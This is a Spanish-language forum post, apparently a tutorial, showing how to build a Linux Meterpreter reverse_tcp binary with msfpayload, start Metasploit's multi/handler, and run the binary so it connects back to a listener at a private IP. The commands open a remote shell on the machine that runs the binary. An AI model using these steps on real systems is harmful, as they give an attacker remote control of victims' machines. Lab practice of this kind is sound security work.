METERPRETER PARA LINUX

Código: Seleccionar todo

linux/x86/meterpreter/bind_ipv6_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/meterpreter/reverse_ipv6_tcp
linux/x86/meterpreter/reverse_tcp
linux/x86/metsvc_bind_tcp
linux/x86/metsvc_reverse_tcp


Pegándole un ojo a los créditos del payload, vemos la siguiente descripción:


Imagen




Para probarla creamos un binario para no tener que explotar la vulnerabilidad cada prueva que queremos hacer, eso lo hacemos con el comando msfpayload

Código: Seleccionar todo

# cd /opt/metasploit3/msf3
# ./msfpayload linux/x86/meterpreter/reverse_tcp LHOST=172.16.24.150 X> /tmp/meterlin.bin


Para usar el multi/handler (módulo al que le especificas el payload y sirve para poder recoger las conexiones, tanto directas como inversas, de los diferentes payloads de Metasploit):

Código: Seleccionar todo

# ./msfconsole
msf > use multi/handler
msf exploit(handler) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.16.24.150
msf exploit(handler) > exploit


Por ultimo lanzamos el binario generado previamente para que realice la conexión inversa hasta el multi/handler que he lanzado en Metasploit:


Código: Seleccionar todo

# cd /tmp
# ./meterlin.bin


Y vemos los mensajes a los que estamos acostumbrados:



Imagen




Fuente: DDLR
Responder

Volver a “Linux”